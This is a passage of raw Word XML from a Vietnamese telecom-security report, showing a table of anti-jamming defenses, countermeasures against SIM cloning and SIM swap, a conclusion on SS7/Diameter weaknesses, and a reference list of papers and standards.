      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3 Phòng Thủ Chống Jamming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Kỹ thuật phòng thủ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cơ chế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hiệu quả</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">FHSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Frequency Hopping SS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nhảy tần giả ngẫu nhiên ~1600 lần/giây (Bluetooth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao (cần jammer có bandwidth rộng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">DSSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Direct Sequence SS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trải tín hiệu trên băng thông rộng, processing gain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao (cần jammer công suất rất lớn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Antenna Diversity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nhiều ăng-ten hướng khác nhau, chuyển ăng-ten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trung bình (nếu jammer không directional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Adaptive Modulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Giảm MCS khi SNR thấp (từ 64QAM về QPSK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp (chỉ kéo dài thời gian, không chặn hoàn toàn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Cognitive Radio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tự động phát hiện và di chuyển sang kênh sạch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao (nếu phổ tần dự phòng có sẵn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">RF Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Spectrum analyzer phát hiện jamming signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Phát hiện được nhưng không ngăn chặn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="89" w:name="phòng-thủ-chống-sim-cloning"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4 Phòng Thủ Chống SIM Cloning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade lên USIM (UMTS SIM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: MILENAGE + mutual authentication → COMP128v1 không còn áp dụng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chính sách SIM Swap nghiêm ngặt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Yêu cầu 2 hình thức xác minh; gửi OTP qua email trước khi swap; delay 24h; thông báo SMS/email cho chủ tài khoản</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Number Portability with SIM binding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Liên kết SIM ICCID với số điện thoại, yêu cầu xác minh cả ICCID khi swap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">App-based 2FA thay SMS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: TOTP (Google Authenticator, FIDO2) không bị ảnh hưởng bởi SS7/SIM swap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="kết-luận"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13. Kết Luận</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phân tích chi tiết trong báo cáo này cho thấy hạ tầng mạng di động toàn cầu tồn tại một chuỗi lỗ hổng có hệ thống, bắt nguồn từ ba vấn đề cơ bản:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. Thiết kế giao thức trong thời kỳ pre-security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SS7 (1975) và ngay cả Diameter (2003) được thiết kế trong mô hình mạng đóng, tin tưởng lẫn nhau hoàn toàn. Khi Internet kết nối các mạng này lại, mô hình tin tưởng đó trở thành lỗ hổng nghiêm trọng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. Tính mở của phổ vô tuyến</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Giao diện không dây là kênh chia sẻ vật lý, không có ranh giới phân chia cứng như cáp quang. Bất kỳ thiết bị phát sóng nào đủ mạnh đều có thể can thiệp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tốc độ nâng cấp hạ tầng chậm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Thế giới vẫn đang vận hành song song 2G/3G/4G/5G, tạo ra attack surface từ tất cả thế hệ cũ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Xu hướng phòng thủ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5G NR SA (Standalone)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">với SUCI, mutual authentication, và core network tách biệt khỏi SS7 giải quyết một phần lớn vấn đề, nhưng quá trình chuyển đổi toàn cầu sẽ mất nhiều thập kỷ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Telecom Security Operations Center (T-SOC)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">với real-time SS7/Diameter monitoring đang trở thành tiêu chuẩn tại các nhà mạng lớn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-trust signalling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Mọi lệnh MAP/Diameter đều được xác minh origin trước khi thực thi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nghiên cứu và hiểu biết về các kỹ thuật này là nền tảng bắt buộc cho:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Thiết kế và kiểm thử an toàn hệ thống viễn thông (telecom security assessment)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Phát triển hệ thống phát hiện xâm nhập cho mạng signalling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Hoạch định chính sách bảo mật viễn thông quốc gia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Nghiên cứu và phát triển các thế hệ giao thức an toàn hơn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:id="96" w:name="tài-liệu-tham-khảo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. Tài Liệu Tham Khảo</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="92" w:name="bài-báo-học-thuật-và-hội-thảo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bài Báo Học Thuật và Hội Thảo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Engel, T. (2014).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SS7: Locate. Track. Manipulate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 31st Chaos Communication Congress (31C3). CCC, Hamburg.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nohl, K., Melette, L., &amp; Münch, H. (2014).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile self-defense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 31C3. CCC, Hamburg.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Golde, N., Redon, K., &amp; Borgaonkar, R. (2013).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weaponizing femtocells: The effect of rogue devices on mobile telecommunication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. NDSS Symposium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dabrowski, A., Pianta, N., Klepp, T., Huber, M., &amp; Weippl, E. (2014).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">IMSI-Catch Me If You Can: IMSI-Catcher-Catchers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ACSAC 2014.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shaik, A., Borgaonkar, R., Asokan, N., Niemi, V., &amp; Seifert, J. P. (2015).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Practical attacks against privacy and availability in 4G/LTE mobile communication systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. NDSS 2016.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rupprecht, D., Kohls, K., Holz, T., &amp; Pöpper, C. (2019).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Breaking LTE on Layer Two</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. IEEE S&amp;P 2019.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bitsikas, E., &amp; Pöpper, C. (2021).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Don’t hand it over: Vulnerabilities in the handover procedure of cellular telecommunications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ACSAC 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hussain, S. R., Echeverria, M., Chowdhury, O., Li, N., &amp; Bertino, E. (2019).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privacy attacks to the 4G and 5G cellular paging protocols using side channel information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. NDSS 2019.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:id="93" w:name="tài-liệu-kỹ-thuật-tiêu-chuẩn"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tài Liệu Kỹ Thuật Tiêu Chuẩn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3GPP TS 29.002 v17.x.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Application Part (MAP) specification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3rd Generation Partnership Project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3GPP TS 29.272 v17.x.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">MME and SGSN related interfaces based on Diameter protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3GPP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3GPP TS 33.401 v17.x.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">3GPP System Architecture Evolution (SAE): Security architecture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3GPP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3GPP TS 33.501 v17.x.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security architecture and procedures for 5G System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3GPP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ITU-T Q.700–Q.716.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Specifications of Signalling System No. 7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ITU Telecommunication Standardization Sector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RFC 6733.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Diameter Base Protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. IETF, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GSMA FS.11 v4.0.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SS7 and SIGTRAN Network Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. GSMA, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GSMA FS.19 v2.0.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Diameter Interconnect Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. GSMA, 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GSMA IR.82.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SS7 Security Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. GSMA.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="94" w:name="báo-cáo-kỹ-thuật-ngành"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Báo Cáo Kỹ Thuật Ngành</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Positive Technologies. (2018).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability analysis of SS7 and Diameter signalling networks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Positive Technologies Technical Report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Positive Technologies. (2020).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Telecom security assessment: SS7 networks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Annual Report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ETSI EN 302 755 v1.4.1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Digital Video Broadcasting (DVB); DVB-T2: Second generation framing, channel coding and modulation systems for broadcasting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ETSI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST SP 800-187.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Guide to LTE Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. National Institute of Standards and Technology, 2017.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="95" w:name="phần-mềm-và-công-cụ-mã-nguồn-mở"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
